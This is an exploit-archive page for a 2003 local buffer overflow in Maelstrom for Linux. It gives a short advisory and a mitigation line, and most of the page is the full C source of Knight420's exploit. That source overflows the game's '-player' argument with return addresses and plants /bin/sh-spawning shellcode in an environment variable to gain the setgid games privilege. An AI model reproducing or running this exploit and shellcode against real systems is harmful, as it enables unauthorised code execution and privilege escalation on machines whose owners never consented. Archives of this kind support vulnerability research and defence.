Maelstrom for Linux Buffer Overflow Vulnerability

vendor:

Maelstrom

by:

Knight420

7.2

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Maelstrom

Affected Version From: 3.0.5

Affected Version To: 3.0.6

Patch Exists: NO

Related CWE: N/A

CPE: a:stardock:maelstrom

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2003

Maelstrom for Linux Buffer Overflow Vulnerability

Maelstrom for Linux has been reported prone to a buffer overflow vulnerability. The issue is reportedly due to a lack of sufficient bounds checking performed on user-supplied data before it is copied into an internal memory space. It may be possible for a local attacker to exploit this condition and have malicious arbitrary code executed in the context of the Maelstrom application. Typically setGID games.

Mitigation:

Perform bounds checking on user-supplied data before copying it into an internal memory space.

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/7632/info
 
Maelstrom for Linux has been reported prone to a buffer overflow vulnerability.
 
The issue is reportedly due to a lack of sufficient bounds checking performed on user-supplied data before it is copied into an internal memory space. It may be possible for a local attacker to exploit this condition and have malicious arbitrary code executed in the context of the Maelstrom application. Typically setGID games.
 
It should be noted that although this vulnerability has been reported to affect Maelstrom version 3.0.6 and 3.0.5 previous versions might also be affected. 

/*
 * ==================================================
 * MaelstromX.c /usr/bin/Maelstrom local exploit
 * By: Knight420
 * 05/20/03
 *
 * Gr33tz to: sorbo, sonyy, sloth, and all of #open
 *
 *  -player or -server works
 * ( ./MaelstromX 100 3 ) works on slackware 8.1
 *
 * (C) COPYRIGHT Blue Ballz , 2003
 * all rights reserved
 * =================================================
 *
 */

#include <stdio.h>

#define STACK_START 0xC0000000
#define SWITCH "-player"

char shellcode[] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
        "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
        "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
        "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";

int main(int argc, char *argv[]) {
        char buff[8200];
        char buff2[8200];
        int *ptr;
        int ret;
        char *arg[] = { "Maelstrom",SWITCH,buff,NULL } ;
        char *env[] = { buff2, NULL };

        if(argc < 2) {
	      printf ("Maelstrom Local Exploit by: Knight420\n");  
              printf("Usage: %s <ret> <align>\n",argv[0]);
                exit(0);
        }

        ret = STACK_START - atoi(argv[1]);
	  memset(buff,'A',100);
        for(ptr = (int*)&buff[atoi(argv[2])]; ptr < (int*)&buff[8200]; ptr++)
                *ptr = ret;
        buff[sizeof(buff)-1] = 0;
        memcpy(buff,"1@",2);

        snprintf(buff2,sizeof(buff2),"SHELL=%s",shellcode);
	  printf ("Maelstrom Local Exploit by: Knight420\n");
        printf ("Return Addr: %p\n",ret);
        printf ("Spawning sh3ll\n");
        execve("/usr/local/bin/Maelstrom",arg,env);
}